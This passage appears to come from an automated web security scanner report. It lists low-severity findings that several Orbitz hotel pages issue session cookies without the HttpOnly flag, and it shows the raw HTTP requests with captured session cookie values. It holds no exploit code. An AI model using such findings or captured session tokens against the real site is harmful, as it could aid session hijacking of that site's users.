GET /hotels/Canada--ON/Toronto/ HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

12.168. http://www.orbitz.com/hotels/France/Nice/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.orbitz.com
Path:	/hotels/France/Nice/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=1AF2BDC7336554AF99ED45E1A21894A1; Path=/
AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:17 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotels/France/Nice/ HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

12.169. http://www.orbitz.com/hotels/France/Paris/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.orbitz.com
Path:	/hotels/France/Paris/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=C8A51BA9BDBBD26D20FC4334F7CA2E66; Path=/
AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:15 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotels/France/Paris/ HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

12.170. http://www.orbitz.com/hotels/Mexico/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.orbitz.com
Path:	/hotels/Mexico/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=D2C85D554CA32ADDC54E94FFDF0230B3; Path=/
AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:28 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotels/Mexico/ HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D2C85D554CA32ADDC54E94FFDF0230B3; Path=/
Set-Cookie: AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:28 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 16:12:21 GMT
Content-Length: 94803

...[SNIP]...

12.171. http://www.orbitz.com/hotels/Mexico/Cancun/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.orbitz.com
Path:	/hotels/Mexico/Cancun/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=A7C11ECB0E3B30FA10F527B9D00A483D; Path=/
AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:28 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotels/Mexico/Cancun/ HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

12.172. http://www.orbitz.com/hotels/Mexico/Playa_Del_Carmen/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.orbitz.com
Path:	/hotels/Mexico/Playa_Del_Carmen/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=474B9D21867D878F5D238FE6587CDFD0; Path=/
AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:35 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotels/Mexico/Playa_Del_Carmen/ HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

12.173. http://www.orbitz.com/hotels/United_Kingdom/London/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.orbitz.com
Path:	/hotels/United_Kingdom/London/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=DF1AC56A4A36657194045DCBE807270F; Path=/
AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:17 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotels/United_Kingdom/London/ HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

12.174. http://www.orbitz.com/hotels/United_States--CA/Los_Angeles/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.orbitz.com
Path:	/hotels/United_States--CA/Los_Angeles/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=BB91361DBADE1A51A4DFD6A67CD15903; Path=/
AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:50 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotels/United_States--CA/Los_Angeles/ HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

12.175. http://www.orbitz.com/hotels/United_States--CA/Los_Angeles/%20 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.orbitz.com
Path:	/hotels/United_States--CA/Los_Angeles/%20

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=5A05E82B8C1D2F635C9D1B06395759E9; Path=/
AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:42 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotels/United_States--CA/Los_Angeles/%20 HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5A05E82B8C1D2F635C9D1B06395759E9; Path=/
Set-Cookie: AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:42 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Length: 34
Date: Wed, 02 Feb 2011 16:12:43 GMT

<html>
</html>

12.176. http://www.orbitz.com/hotels/United_States--CA/San_Diego/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.orbitz.com
Path:	/hotels/United_States--CA/San_Diego/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=067DEC1369D71276439BBE2E814093F2; Path=/
AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:52 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotels/United_States--CA/San_Diego/ HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

12.177. http://www.orbitz.com/hotels/United_States--CA/San_Francisco/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.orbitz.com
Path:	/hotels/United_States--CA/San_Francisco/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=6E407EEB7C11176786FE98DFEBED0C34; Path=/
AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:44 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotels/United_States--CA/San_Francisco/ HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
